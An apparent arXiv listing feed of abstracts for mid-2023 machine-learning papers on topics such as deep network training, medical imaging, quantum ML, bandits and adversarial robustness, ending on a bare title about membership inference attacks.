    Successive Affine Learning for Deep Neural Networks. (arXiv:2305.07996v2 [cs.LG] UPDATED)
    This paper introduces a successive affine learning (SAL) model for constructing deep neural networks (DNNs). Traditionally, a DNN is built by solving a non-convex optimization problem. It is often challenging to solve such a problem numerically due to its non-convexity and having a large number of layers. To address this challenge, inspired by the human education system, the multi-grade deep learning (MGDL) model was recently initiated by the author of this paper. The MGDL model learns a DNN in several grades, in each of which one constructs a shallow DNN consisting of a relatively small number of layers. The MGDL model still requires solving several non-convex optimization problems. The proposed SAL model mutates from the MGDL model. Noting that each layer of a DNN consists of an affine map followed by an activation function, we propose to learn the affine map by solving a quadratic/convex optimization problem which involves the activation function only {\it after} the weight matrix and the bias vector for the current layer have been trained. In the context of function approximation, for a given function the SAL model generates an expansion of the function with adaptive basis functions in the form of DNNs. We establish the Pythagorean identity and the Parseval identity for the system generated by the SAL model. Moreover, we provide a convergence theorem of the SAL process in the sense that either it terminates after a finite number of grades or the norms of its optimal error functions strictly decrease to a limit as the grade number increases to infinity. Furthermore, we present numerical examples of proof of concept which demonstrate that the proposed SAL model significantly outperforms the traditional deep learning model.  ( 3 min )
    Exploring Image Augmentations for Siamese Representation Learning with Chest X-Rays. (arXiv:2301.12636v2 [eess.IV] UPDATED)
    Image augmentations are quintessential for effective visual representation learning across self-supervised learning techniques. While augmentation strategies for natural imaging have been studied extensively, medical images are vastly different from their natural counterparts. Thus, it is unknown whether common augmentation strategies employed in Siamese representation learning generalize to medical images and to what extent. To address this challenge, in this study, we systematically assess the effect of various augmentations on the quality and robustness of the learned representations. We train and evaluate Siamese Networks for abnormality detection on chest X-Rays across three large datasets (MIMIC-CXR, CheXpert and VinDR-CXR). We investigate the efficacy of the learned representations through experiments involving linear probing, fine-tuning, zero-shot transfer, and data efficiency. Finally, we identify a set of augmentations that yield robust representations that generalize well to both out-of-distribution data and diseases, while outperforming supervised baselines using just zero-shot transfer and linear probes by up to 20%. Our code is available at https://github.com/StanfordMIMI/siaug.  ( 2 min )
    Generative Pretrained Autoregressive Transformer Graph Neural Network applied to the Analysis and Discovery of Novel Proteins. (arXiv:2305.04934v2 [q-bio.BM] UPDATED)
    We report a flexible language-model based deep learning strategy, applied here to solve complex forward and inverse problems in protein modeling, based on an attention neural network that integrates transformer and graph convolutional architectures in a causal multi-headed graph mechanism, to realize a generative pretrained model. The model is applied to predict secondary structure content (per-residue level and overall content), protein solubility, and sequencing tasks. Further trained on inverse tasks, the model is rendered capable of designing proteins with these properties as target features. The model is formulated as a general framework, completely prompt-based, and can be adapted for a variety of downstream tasks. We find that adding additional tasks yields emergent synergies that the model exploits in improving overall performance, beyond what would be possible by training a model on each dataset alone. Case studies are presented to validate the method, yielding protein designs specifically focused on structural proteins, but also exploring the applicability in the design of soluble, antimicrobial biomaterials. While our model is trained to ultimately perform 8 distinct tasks, with available datasets it can be extended to solve additional problems. In a broader sense, this work illustrates a form of multiscale modeling that relates a set of ultimate building blocks (here, byte-level utf8 characters that define the nature of the physical system at hand) to complex output. This materiomic scheme captures complex emergent relationships between universal building block and resulting properties via a synergizing learning capacity to express a set of potentialities embedded in the knowledge used in training, via the interplay of universality and diversity.  ( 3 min )
    Prediction intervals for neural network models using weighted asymmetric loss functions. (arXiv:2210.04318v4 [stat.ML] UPDATED)
    We propose a simple and efficient approach to generate a prediction intervals (PI) for approximated and forecasted trends. Our method leverages a weighted asymmetric loss function to estimate the lower and upper bounds of the PI, with the weights determined by its coverage probability. We provide a concise mathematical proof of the method, show how it can be extended to derive PIs for parametrised functions and argue why the method works for predicting PIs of dependent variables. The presented tests of the method on a real-world forecasting task using a neural network-based model show that it can produce reliable PIs in complex machine learning scenarios.  ( 2 min )
    QI2 -- an Interactive Tool for Data Quality Assurance. (arXiv:2307.03419v2 [cs.CY] CROSS LISTED)
    The importance of high data quality is increasing with the growing impact and distribution of ML systems and big data. Also the planned AI Act from the European commission defines challenging legal requirements for data quality especially for the market introduction of safety relevant ML systems. In this paper we introduce a novel approach that supports the data quality assurance process of multiple data quality aspects. This approach enables the verification of quantitative data quality requirements. The concept and benefits are introduced and explained on small example data sets. How the method is applied is demonstrated on the well known MNIST data set based an handwritten digits.  ( 2 min )
    Hybrid quantum-classical machine learning for generative chemistry and drug design. (arXiv:2108.11644v2 [quant-ph] UPDATED)
    Deep generative chemistry models emerge as powerful tools to expedite drug discovery. However, the immense size and complexity of the structural space of all possible drug-like molecules pose significant obstacles, which could be overcome with hybrid architectures combining quantum computers with deep classical networks. As the first step toward this goal, we built a compact discrete variational autoencoder (DVAE) with a Restricted Boltzmann Machine (RBM) of reduced size in its latent layer. The size of the proposed model was small enough to fit on a state-of-the-art D-Wave quantum annealer and allowed training on a subset of the ChEMBL dataset of biologically active compounds. Finally, we generated 2331 novel chemical structures with medicinal chemistry and synthetic accessibility properties in the ranges typical for molecules from ChEMBL. The presented results demonstrate the feasibility of using already existing or soon-to-be-available quantum computing devices as testbeds for future drug discovery applications.  ( 2 min )
    Solving PDEs with Unmeasurable Source Terms Using Coupled Physics-Informed Neural Network with Recurrent Prediction for Soft Sensors. (arXiv:2301.08618v3 [cs.LG] UPDATED)
    Partial differential equations (PDEs) are a model candidate for soft sensors in industrial processes with spatiotemporal dependence. Although physics-informed neural networks (PINNs) are a promising machine learning method for solving PDEs, they are infeasible for the nonhomogeneous PDEs with unmeasurable source terms. To this end, a coupled PINN (CPINN) with a recurrent prediction (RP) learning strategy (CPINN- RP) is proposed. First, CPINN composed of NetU and NetG is proposed. NetU is for approximating PDEs solutions and NetG is for regularizing the training of NetU. The two networks are integrated into a data-physics-hybrid loss function. Then, we theoretically prove that the proposed CPINN has a satisfying approximation capability for solutions to nonhomogeneous PDEs with unmeasurable source terms. Besides the theoretical aspects, we propose a hierarchical training strategy to optimize and couple NetU and NetG. Secondly, NetU-RP is proposed for compensating information loss in data sampling to improve the prediction performance, in which RP is the recurrently delayed outputs of well-trained CPINN and hard sensors. Finally, the artificial and practical datasets are used to verify the feasibility and effectiveness of CPINN-RP for soft sensors.  ( 3 min )
    Generalization Error of First-Order Methods for Statistical Learning with Generic Oracles. (arXiv:2307.04679v2 [cs.LG] UPDATED)
    In this paper, we provide a novel framework for the analysis of generalization error of first-order optimization algorithms for statistical learning when the gradient can only be accessed through partial observations given by an oracle. Our analysis relies on the regularity of the gradient w.r.t. the data samples, and allows to derive near matching upper and lower bounds for the generalization error of multiple learning problems, including supervised learning, transfer learning, robust learning, distributed learning and communication efficient learning using gradient quantization. These results hold for smooth and strongly-convex optimization problems, as well as smooth non-convex optimization problems verifying a Polyak-Lojasiewicz assumption. In particular, our upper and lower bounds depend on a novel quantity that extends the notion of conditional standard deviation, and is a measure of the extent to which the gradient can be approximated by having access to the oracle. As a consequence, our analysis provides a precise meaning to the intuition that optimization of the statistical learning objective is as hard as the estimation of its gradient. Finally, we show that, in the case of standard supervised learning, mini-batch gradient descent with increasing batch sizes and a warm start can reach a generalization error that is optimal up to a multiplicative factor, thus motivating the use of this optimization scheme in practical applications.  ( 3 min )
    Temporal Conditioning Spiking Latent Variable Models of the Neural Response to Natural Visual Scenes. (arXiv:2306.12045v2 [q-bio.NC] UPDATED)
    Developing computational models of neural response is crucial for understanding sensory processing and neural computations. Current state-of-the-art neural network methods use temporal filters to handle temporal dependencies, resulting in an unrealistic and inflexible processing flow. Meanwhile, these methods target trial-averaged firing rates and fail to capture important features in spike trains. This work presents the temporal conditioning spiking latent variable models (TeCoS-LVM) to simulate the neural response to natural visual stimuli. We use spiking neurons to produce spike outputs that directly match the recorded trains. This approach helps to avoid losing information embedded in the original spike trains. We exclude the temporal dimension from the model parameter space and introduce a temporal conditioning operation to allow the model to adaptively explore and exploit temporal dependencies in stimuli sequences in a natural paradigm. We show that TeCoS-LVM models can produce more realistic spike activities and accurately fit spike statistics than powerful alternatives. Additionally, learned TeCoS-LVM models can generalize well to longer time scales. Overall, while remaining computationally tractable, our model effectively captures key features of neural coding systems. It thus provides a useful tool for building accurate predictive computational accounts for various sensory perception circuits.  ( 3 min )
    I2I: Initializing Adapters with Improvised Knowledge. (arXiv:2304.02168v2 [cs.CL] UPDATED)
    Adapters present a promising solution to the catastrophic forgetting problem in continual learning. However, training independent Adapter modules for every new task misses an opportunity for cross-task knowledge transfer. We propose Improvise to Initialize (I2I), a continual learning algorithm that initializes Adapters for incoming tasks by distilling knowledge from previously-learned tasks' Adapters. We evaluate I2I on CLiMB, a multimodal continual learning benchmark, by conducting experiments on sequences of visual question answering tasks. Adapters trained with I2I consistently achieve better task accuracy than independently-trained Adapters, demonstrating that our algorithm facilitates knowledge transfer between task Adapters. I2I also results in better cross-task knowledge transfer than the state-of-the-art AdapterFusion without incurring the associated parametric cost.  ( 2 min )
    High Dimensional Quantum Machine Learning With Small Quantum Computers. (arXiv:2203.13739v3 [quant-ph] UPDATED)
    Quantum computers hold great promise to enhance machine learning, but their current qubit counts restrict the realisation of this promise. In an attempt to placate this limitation techniques can be applied for evaluating a quantum circuit using a machine with fewer qubits than the circuit naively requires. These techniques work by evaluating many smaller circuits on the smaller machine, that are then combined in a polynomial to replicate the output of the larger machine. This scheme requires more circuit evaluations than are practical for general circuits. However, we investigate the possibility that for certain applications many of these subcircuits are superfluous, and that a much smaller sum is sufficient to estimate the full circuit. We construct a machine learning model that may be capable of approximating the outputs of the larger circuit with much fewer circuit evaluations. We successfully apply our model to the task of digit recognition, using simulated quantum computers much smaller than the data dimension. The model is also applied to the task of approximating a random 10 qubit PQC with simulated access to a 5 qubit computer, even with only relatively modest number of circuits our model provides an accurate approximation of the 10 qubit PQCs output, superior to a neural network attempt. The developed method might be useful for implementing quantum models on larger data throughout the NISQ era.
    Protecting the Future: Neonatal Seizure Detection with Spatial-Temporal Modeling. (arXiv:2307.05382v1 [eess.SP])
    A timely detection of seizures for newborn infants with electroencephalogram (EEG) has been a common yet life-saving practice in the Neonatal Intensive Care Unit (NICU). However, it requires great human efforts for real-time monitoring, which calls for automated solutions to neonatal seizure detection. Moreover, the current automated methods focusing on adult epilepsy monitoring often fail due to (i) dynamic seizure onset location in human brains; (ii) different montages on neonates and (iii) huge distribution shift among different subjects. In this paper, we propose a deep learning framework, namely STATENet, to address the exclusive challenges with exquisite designs at the temporal, spatial and model levels. The experiments over the real-world large-scale neonatal EEG dataset illustrate that our framework achieves significantly better seizure detection performance.
    Responsive parallelized architecture for deploying deep learning models in production environments. (arXiv:2112.08933v2 [cs.LG] UPDATED)
    Recruiters can easily shortlist candidates for jobs via viewing their curriculum vitae (CV) document. Unstructured document CV beholds candidate's portfolio and named entities listing details. The main aim of this study is to design and propose a web oriented, highly responsive, computational pipeline that systematically predicts CV entities using hierarchically-refined label attention networks. Deep learning models specialized for named entity recognition were trained on large dataset to predict relevant fields. The article suggests an optimal strategy to use a number of deep learning models in parallel and predict in real time. We demonstrate selection of light weight micro web framework using Analytical Hierarchy Processing algorithm and focus on an approach useful to deploy large deep learning model-based pipelines in production ready environments using microservices. Deployed models and architecture proposed helped in parsing normal CV in less than 700 milliseconds for sequential flow of requests.
    AdaptiveRec: Adaptively Construct Pairs for Contrastive Learning in Sequential Recommendation. (arXiv:2307.05469v1 [cs.IR])
    This paper presents a solution to the challenges faced by contrastive learning in sequential recommendation systems. In particular, it addresses the issue of false negative, which limits the effectiveness of recommendation algorithms. By introducing an advanced approach to contrastive learning, the proposed method improves the quality of item embeddings and mitigates the problem of falsely categorizing similar instances as dissimilar. Experimental results demonstrate performance enhancements compared to existing systems. The flexibility and applicability of the proposed approach across various recommendation scenarios further highlight its value in enhancing sequential recommendation systems.
    Mitigating the Accuracy-Robustness Trade-off via Multi-Teacher Adversarial Distillation. (arXiv:2306.16170v2 [cs.LG] UPDATED)
    Adversarial training is a practical approach for improving the robustness of deep neural networks against adversarial attacks. Although bringing reliable robustness, the performance toward clean examples is negatively affected after adversarial training, which means a trade-off exists between accuracy and robustness. Recently, some studies have tried to use knowledge distillation methods in adversarial training, achieving competitive performance in improving the robustness but the accuracy for clean samples is still limited. In this paper, to mitigate the accuracy-robustness trade-off, we introduce the Multi-Teacher Adversarial Robustness Distillation (MTARD) to guide the model's adversarial training process by applying a strong clean teacher and a strong robust teacher to handle the clean examples and adversarial examples, respectively. During the optimization process, to ensure that different teachers show similar knowledge scales, we design the Entropy-Based Balance algorithm to adjust the teacher's temperature and keep the teachers' information entropy consistent. Besides, to ensure that the student has a relatively consistent learning speed from multiple teachers, we propose the Normalization Loss Balance algorithm to adjust the learning weights of different types of knowledge. A series of experiments conducted on public datasets demonstrate that MTARD outperforms the state-of-the-art adversarial training and distillation methods against various adversarial attacks.
    Continual Learning on Dynamic Graphs via Parameter Isolation. (arXiv:2305.13825v2 [cs.LG] UPDATED)
    Many real-world graph learning tasks require handling dynamic graphs where new nodes and edges emerge. Dynamic graph learning methods commonly suffer from the catastrophic forgetting problem, where knowledge learned for previous graphs is overwritten by updates for new graphs. To alleviate the problem, continual graph learning methods are proposed. However, existing continual graph learning methods aim to learn new patterns and maintain old ones with the same set of parameters of fixed size, and thus face a fundamental tradeoff between both goals. In this paper, we propose Parameter Isolation GNN (PI-GNN) for continual learning on dynamic graphs that circumvents the tradeoff via parameter isolation and expansion. Our motivation lies in that different parameters contribute to learning different graph patterns. Based on the idea, we expand model parameters to continually learn emerging graph patterns. Meanwhile, to effectively preserve knowledge for unaffected patterns, we find parameters that correspond to them via optimization and freeze them to prevent them from being rewritten. Experiments on eight real-world datasets corroborate the effectiveness of PI-GNN compared to state-of-the-art baselines.
    Defining data science: a new field of inquiry. (arXiv:2306.16177v2 [cs.LG] UPDATED)
    Data science is not a science. It is a research paradigm. Its power, scope, and scale will surpass science, our most powerful research paradigm, to enable knowledge discovery and change our world. We have yet to understand and define it, vital to realizing its potential and managing its risks. Modern data science is in its infancy. Emerging slowly since 1962 and rapidly since 2000, it is a fundamentally new field of inquiry, one of the most active, powerful, and rapidly evolving 21st century innovations. Due to its value, power, and applicability, it is emerging in 40+ disciplines, hundreds of research areas, and thousands of applications. Millions of data science publications contain myriad definitions of data science and data science problem solving. Due to its infancy, many definitions are independent, application-specific, mutually incomplete, redundant, or inconsistent, hence so is data science. This research addresses this data science multiple definitions challenge by proposing the development of coherent, unified definition based on a data science reference framework using a data science journal for the data science community to achieve such a definition. This paper provides candidate definitions for essential data science artifacts that are required to discuss such a definition. They are based on the classical research paradigm concept consisting of a philosophy of data science, the data science problem solving paradigm, and the six component data science reference framework (axiology, ontology, epistemology, methodology, methods, technology) that is a frequently called for unifying framework with which to define, unify, and evolve data science. It presents challenges for defining data science, solution approaches, i.e., means for defining data science, and their requirements and benefits as the basis of a comprehensive solution.
    Randomized Exploration in Generalized Linear Bandits. (arXiv:1906.08947v3 [cs.LG] UPDATED)
    We study two randomized algorithms for generalized linear bandits. The first, GLM-TSL, samples a generalized linear model (GLM) from the Laplace approximation to the posterior distribution. The second, GLM-FPL, fits a GLM to a randomly perturbed history of past rewards. We analyze both algorithms and derive $\tilde{O}(d \sqrt{n \log K})$ upper bounds on their $n$-round regret, where $d$ is the number of features and $K$ is the number of arms. The former improves on prior work while the latter is the first for Gaussian noise perturbations in non-linear models. We empirically evaluate both GLM-TSL and GLM-FPL in logistic bandits, and apply GLM-FPL to neural network bandits. Our work showcases the role of randomization, beyond posterior sampling, in exploration.
    Automating Augmentation Through Random Unidimensional Search. (arXiv:2106.08756v3 [cs.LG] UPDATED)
    It is no secret amongst deep learning researchers that finding the optimal data augmentation strategy during training can mean the difference between state-of-the-art performance and a run-of-the-mill result. To that end, the community has seen many efforts to automate the process of finding the perfect augmentation procedure for any task at hand. Unfortunately, even recent cutting-edge methods bring massive computational overhead, requiring as many as 100 full model trainings to settle on an ideal configuration. We show how to achieve equivalent performance using just 6 trainings with Random Unidimensional Augmentation. Source code is available at https://github.com/fastestimator/RUA/tree/v1.0
    The Statistical Complexity of Interactive Decision Making. (arXiv:2112.13487v3 [cs.LG] UPDATED)
    A fundamental challenge in interactive learning and decision making, ranging from bandit problems to reinforcement learning, is to provide sample-efficient, adaptive learning algorithms that achieve near-optimal regret. This question is analogous to the classical problem of optimal (supervised) statistical learning, where there are well-known complexity measures (e.g., VC dimension and Rademacher complexity) that govern the statistical complexity of learning. However, characterizing the statistical complexity of interactive learning is substantially more challenging due to the adaptive nature of the problem. The main result of this work provides a complexity measure, the Decision-Estimation Coefficient, that is proven to be both necessary and sufficient for sample-efficient interactive learning. In particular, we provide: 1. a lower bound on the optimal regret for any interactive decision making problem, establishing the Decision-Estimation Coefficient as a fundamental limit. 2. a unified algorithm design principle, Estimation-to-Decisions (E2D), which transforms any algorithm for supervised estimation into an online algorithm for decision making. E2D attains a regret bound that matches our lower bound up to dependence on a notion of estimation performance, thereby achieving optimal sample-efficient learning as characterized by the Decision-Estimation Coefficient. Taken together, these results constitute a theory of learnability for interactive decision making. When applied to reinforcement learning settings, the Decision-Estimation Coefficient recovers essentially all existing hardness results and lower bounds. More broadly, the approach can be viewed as a decision-theoretic analogue of the classical Le Cam theory of statistical estimation; it also unifies a number of existing approaches -- both Bayesian and frequentist.
    The Implicit Bias of Batch Normalization in Linear Models and Two-layer Linear Convolutional Neural Networks. (arXiv:2306.11680v2 [cs.LG] UPDATED)
    We study the implicit bias of batch normalization trained by gradient descent. We show that when learning a linear model with batch normalization for binary classification, gradient descent converges to a uniform margin classifier on the training data with an $\exp(-\Omega(\log^2 t))$ convergence rate. This distinguishes linear models with batch normalization from those without batch normalization in terms of both the type of implicit bias and the convergence rate. We further extend our result to a class of two-layer, single-filter linear convolutional neural networks, and show that batch normalization has an implicit bias towards a patch-wise uniform margin. Based on two examples, we demonstrate that patch-wise uniform margin classifiers can outperform the maximum margin classifiers in certain learning problems. Our results contribute to a better theoretical understanding of batch normalization.
    Domain-Agnostic Neural Architecture for Class Incremental Continual Learning in Document Processing Platform. (arXiv:2307.05399v1 [cs.LG])
    Production deployments in complex systems require ML architectures to be highly efficient and usable against multiple tasks. Particularly demanding are classification problems in which data arrives in a streaming fashion and each class is presented separately. Recent methods with stochastic gradient learning have been shown to struggle in such setups or have limitations like memory buffers, and being restricted to specific domains that disable its usage in real-world scenarios. For this reason, we present a fully differentiable architecture based on the Mixture of Experts model, that enables the training of high-performance classifiers when examples from each class are presented separately. We conducted exhaustive experiments that proved its applicability in various domains and ability to learn online in production environments. The proposed technique achieves SOTA results without a memory buffer and clearly outperforms the reference methods.
    Using BOLD-fMRI to Compute the Respiration Volume per Time (RTV) and Respiration Variation (RV) with Convolutional Neural Networks (CNN) in the Human Connectome Development Cohort. (arXiv:2307.05426v1 [eess.SP])
    In many fMRI studies, respiratory signals are unavailable or do not have acceptable quality. Consequently, the direct removal of low-frequency respiratory variations from BOLD signals is not possible. This study proposes a one-dimensional CNN model for reconstruction of two respiratory measures, RV and RVT. Results show that a CNN can capture informative features from resting BOLD signals and reconstruct realistic RV and RVT timeseries. It is expected that application of the proposed method will lower the cost of fMRI studies, reduce complexity, and decrease the burden on participants as they will not be required to wear a respiratory bellows.
    ISLTranslate: Dataset for Translating Indian Sign Language. (arXiv:2307.05440v1 [cs.CL])
    Sign languages are the primary means of communication for many hard-of-hearing people worldwide. Recently, to bridge the communication gap between the hard-of-hearing community and the rest of the population, several sign language translation datasets have been proposed to enable the development of statistical sign language translation systems. However, there is a dearth of sign language resources for the Indian sign language. This resource paper introduces ISLTranslate, a translation dataset for continuous Indian Sign Language (ISL) consisting of 31k ISL-English sentence/phrase pairs. To the best of our knowledge, it is the largest translation dataset for continuous Indian Sign Language. We provide a detailed analysis of the dataset. To validate the performance of existing end-to-end Sign language to spoken language translation systems, we benchmark the created dataset with a transformer-based model for ISL translation.
    Metropolis Sampling for Constrained Diffusion Models. (arXiv:2307.05439v1 [cs.LG])
    Denoising diffusion models have recently emerged as the predominant paradigm for generative modelling. Their extension to Riemannian manifolds has facilitated their application to an array of problems in the natural sciences. Yet, in many practical settings, such manifolds are defined by a set of constraints and are not covered by the existing (Riemannian) diffusion model methodology. Recent work has attempted to address this issue by employing novel noising processes based on logarithmic barrier methods or reflected Brownian motions. However, the associated samplers are computationally burdensome as the complexity of the constraints increases. In this paper, we introduce an alternative simple noising scheme based on Metropolis sampling that affords substantial gains in computational efficiency and empirical performance compared to the earlier samplers. Of independent interest, we prove that this new process corresponds to a valid discretisation of the reflected Brownian motion. We demonstrate the scalability and flexibility of our approach on a range of problem settings with convex and non-convex constraints, including applications from geospatial modelling, robotics and protein design.
    A Self-Supervised Algorithm for Denoising Photoplethysmography Signals for Heart Rate Estimation from Wearables. (arXiv:2307.05339v1 [eess.SP])
    Smart watches and other wearable devices are equipped with photoplethysmography (PPG) sensors for monitoring heart rate and other aspects of cardiovascular health. However, PPG signals collected from such devices are susceptible to corruption from noise and motion artifacts, which cause errors in heart rate estimation. Typical denoising approaches filter or reconstruct the signal in ways that eliminate much of the morphological information, even from the clean parts of the signal that would be useful to preserve. In this work, we develop an algorithm for denoising PPG signals that reconstructs the corrupted parts of the signal, while preserving the clean parts of the PPG signal. Our novel framework relies on self-supervised training, where we leverage a large database of clean PPG signals to train a denoising autoencoder. As we show, our reconstructed signals provide better estimates of heart rate from PPG signals than the leading heart rate estimation methods. Further experiments show significant improvement in Heart Rate Variability (HRV) estimation from PPG signals using our algorithm. We conclude that our algorithm denoises PPG signals in a way that can improve downstream analysis of many different health metrics from wearable devices.
    Action-based Early Autism Diagnosis Using Contrastive Feature Learning. (arXiv:2209.05379v3 [cs.CV] UPDATED)
    Autism, also known as Autism Spectrum Disorder (or ASD), is a neurological disorder. Its main symptoms include difficulty in (verbal and/or non-verbal) communication, and rigid/repetitive behavior. These symptoms are often indistinguishable from a normal (control) individual, due to which this disorder remains undiagnosed in early childhood leading to delayed treatment. Since the learning curve is steep during the initial age, an early diagnosis of autism could allow to take adequate interventions at the right time, which might positively affect the growth of an autistic child. Further, the traditional methods of autism diagnosis require multiple visits to a specialized psychiatrist, however this process can be time-consuming. In this paper, we present a learning based approach to automate autism diagnosis using simple and small action video clips of subjects. This task is particularly challenging because the amount of annotated data available is small, and the variations among samples from the two categories (ASD and control) are generally indistinguishable. This is also evident from poor performance of a binary classifier learned using the cross-entropy loss on top of a baseline encoder. To address this, we adopt contrastive feature learning in both self supervised and supervised learning frameworks, and show that these can lead to a significant increase in the prediction accuracy of a binary classifier on this task. We further validate this by conducting thorough experimental analyses under different set-ups on two publicly available datasets.
    Improving the Security of Smartwatch Payment with Deep Learning. (arXiv:2307.05437v1 [cs.CR])
    Making contactless payments using a smartwatch is increasingly popular, but this payment medium lacks traditional biometric security measures such as facial or fingerprint recognition. In 2022, Sturgess et al. proposed WatchAuth, a system for authenticating smartwatch payments using the physical gesture of reaching towards a payment terminal. While effective, the system requires the user to undergo a burdensome enrolment period to achieve acceptable error levels. In this dissertation, we explore whether applications of deep learning can reduce the number of gestures a user must provide to enrol into an authentication system for smartwatch payment. We firstly construct a deep-learned authentication system that outperforms the current state-of-the-art, including in a scenario where the target user has provided a limited number of gestures. We then develop a regularised autoencoder model for generating synthetic user-specific gestures. We show that using these gestures in training improves classification ability for an authentication system. Through this technique we can reduce the number of gestures required to enrol a user into a WatchAuth-like system without negatively impacting its error rates.
    A Physics-Informed Low-Shot Learning For sEMG-Based Estimation of Muscle Force and Joint Kinematics. (arXiv:2307.05361v1 [eess.SP])
    Muscle force and joint kinematics estimation from surface electromyography (sEMG) are essential for real-time biomechanical analysis of the dynamic interplay among neural muscle stimulation, muscle dynamics, and kinetics. Recent advances in deep neural networks (DNNs) have shown the potential to improve biomechanical analysis in a fully automated and reproducible manner. However, the small sample nature and physical interpretability of biomechanical analysis limit the applications of DNNs. This paper presents a novel physics-informed low-shot learning method for sEMG-based estimation of muscle force and joint kinematics. This method seamlessly integrates Lagrange's equation of motion and inverse dynamic muscle model into the generative adversarial network (GAN) framework for structured feature decoding and extrapolated estimation from the small sample data. Specifically, Lagrange's equation of motion is introduced into the generative model to restrain the structured decoding of the high-level features following the laws of physics. And a physics-informed policy gradient is designed to improve the adversarial learning efficiency by rewarding the consistent physical representation of the extrapolated estimations and the physical references. Experimental validations are conducted on two scenarios (i.e. the walking trials and wrist motion trials). Results indicate that the estimations of the muscle forces and joint kinematics are unbiased compared to the physics-based inverse dynamics, which outperforms the selected benchmark methods, including physics-informed convolution neural network (PI-CNN), vallina generative adversarial network (GAN), and multi-layer extreme learning machine (ML-ELM).
    U-CREAT: Unsupervised Case Retrieval using Events extrAcTion. (arXiv:2307.05260v1 [cs.IR])
    The task of Prior Case Retrieval (PCR) in the legal domain is about automatically citing relevant (based on facts and precedence) prior legal cases in a given query case. To further promote research in PCR, in this paper, we propose a new large benchmark (in English) for the PCR task: IL-PCR (Indian Legal Prior Case Retrieval) corpus. Given the complex nature of case relevance and the long size of legal documents, BM25 remains a strong baseline for ranking the cited prior documents. In this work, we explore the role of events in legal case retrieval and propose an unsupervised retrieval method-based pipeline U-CREAT (Unsupervised Case Retrieval using Events Extraction). We find that the proposed unsupervised retrieval method significantly increases performance compared to BM25 and makes retrieval faster by a considerable margin, making it applicable to real-time case retrieval systems. Our proposed system is generic, we show that it generalizes across two different legal systems (Indian and Canadian), and it shows state-of-the-art performance on the benchmarks for both the legal systems (IL-PCR and COLIEE corpora).
    Boosting Feedback Efficiency of Interactive Reinforcement Learning by Adaptive Learning from Scores. (arXiv:2307.05405v1 [cs.RO])
    Interactive reinforcement learning has shown promise in learning complex robotic tasks. However, the process can be human-intensive due to the requirement of large amount of interactive feedback. This paper presents a new method that uses scores provided by humans, instead of pairwise preferences, to improve the feedback efficiency of interactive reinforcement learning. Our key insight is that scores can yield significantly more data than pairwise preferences. Specifically, we require a teacher to interactively score the full trajectories of an agent to train a behavioral policy in a sparse reward environment. To avoid unstable scores given by human negatively impact the training process, we propose an adaptive learning scheme. This enables the learning paradigm to be insensitive to imperfect or unreliable scores. We extensively evaluate our method on robotic locomotion and manipulation tasks. The results show that the proposed method can efficiently learn near-optimal policies by adaptive learning from scores, while requiring less feedback compared to pairwise preference learning methods. The source codes are publicly available at https://github.com/SSKKai/Interactive-Scoring-IRL.
    A Survey From Distributed Machine Learning to Distributed Deep Learning. (arXiv:2307.05232v1 [cs.LG])
    Artificial intelligence has achieved significant success in handling complex tasks in recent years. This success is due to advances in machine learning algorithms and hardware acceleration. In order to obtain more accurate results and solve more complex problems, algorithms must be trained with more data. This huge amount of data could be time-consuming to process and require a great deal of computation. This solution could be achieved by distributing the data and algorithm across several machines, which is known as distributed machine learning. There has been considerable effort put into distributed machine learning algorithms, and different methods have been proposed so far. In this article, we present a comprehensive summary of the current state-of-the-art in the field through the review of these algorithms. We divide this algorithms in classification and clustering (traditional machine learning), deep learning and deep reinforcement learning groups. Distributed deep learning has gained more attention in recent years and most of studies worked on this algorithms. As a result, most of the articles we discussed here belong to this category. Based on our investigation of algorithms, we highlight limitations that should be addressed in future research.
    Unleashing the Potential of Regularization Strategies in Learning with Noisy Labels. (arXiv:2307.05025v1 [cs.LG])
    In recent years, research on learning with noisy labels has focused on devising novel algorithms that can achieve robustness to noisy training labels while generalizing to clean data. These algorithms often incorporate sophisticated techniques, such as noise modeling, label correction, and co-training. In this study, we demonstrate that a simple baseline using cross-entropy loss, combined with widely used regularization strategies like learning rate decay, model weights average, and data augmentations, can outperform state-of-the-art methods. Our findings suggest that employing a combination of regularization strategies can be more effective than intricate algorithms in tackling the challenges of learning with noisy labels. While some of these regularization strategies have been utilized in previous noisy label learning research, their full potential has not been thoroughly explored. Our results encourage a reevaluation of benchmarks for learning with noisy labels and prompt reconsideration of the role of specialized learning algorithms designed for training with noisy labels.
    Attribute Controlled Dialogue Prompting. (arXiv:2307.05228v1 [cs.CL])
    Prompt-tuning has become an increasingly popular parameter-efficient method for adapting large pretrained language models to downstream tasks. However, both discrete prompting and continuous prompting assume fixed prompts for all data samples within a task, neglecting the fact that inputs vary greatly in some tasks such as open-domain dialogue generation. In this paper, we present a novel, instance-specific prompt-tuning algorithm for dialogue generation. Specifically, we generate prompts based on instance-level control code, rather than the conversation history, to explore their impact on controlled dialogue generation. Experiments on popular open-domain dialogue datasets, evaluated on both automated metrics and human evaluation, demonstrate that our method is superior to prompting baselines and comparable to fine-tuning with only 5%-6% of total parameters.
    Self-Supervised Learning with Lie Symmetries for Partial Differential Equations. (arXiv:2307.05432v1 [cs.LG])
    Machine learning for differential equations paves the way for computationally efficient alternatives to numerical solvers, with potentially broad impacts in science and engineering. Though current algorithms typically require simulated training data tailored to a given setting, one may instead wish to learn useful information from heterogeneous sources, or from real dynamical systems observations that are messy or incomplete. In this work, we learn general-purpose representations of PDEs from heterogeneous data by implementing joint embedding methods for self-supervised learning (SSL), a framework for unsupervised representation learning that has had notable success in computer vision. Our representation outperforms baseline approaches to invariant tasks, such as regressing the coefficients of a PDE, while also improving the time-stepping performance of neural solvers. We hope that our proposed methodology will prove useful in the eventual development of general-purpose foundation models for PDEs.
    The Value of Chess Squares. (arXiv:2307.05330v1 [cs.AI])
    Valuing chess squares and determining the placement of pieces on the board are the main objectives of our study. With the emergence of chess AI, it has become possible to accurately assess the worth of positions in a game of chess. The conventional approach assigns fixed values to pieces $(\symking=\infty, \symqueen=9, \symrook=5, \symbishop=3, \symknight=3, \sympawn=1)$. We enhance this analysis by introducing marginal valuations for both pieces and squares. We demonstrate our method by examining the positioning of Knights and Bishops, and also provide valuable insights into the valuation of pawns. Notably, Nimzowitsch was among the pioneers in advocating for the significance of Pawn structure and valuation. Finally, we conclude by suggesting potential avenues for future research.
    Membership Inference Attacks on DNNs using Adversarial Perturbations. (arXiv:2307.05193v1 [cs.LG])
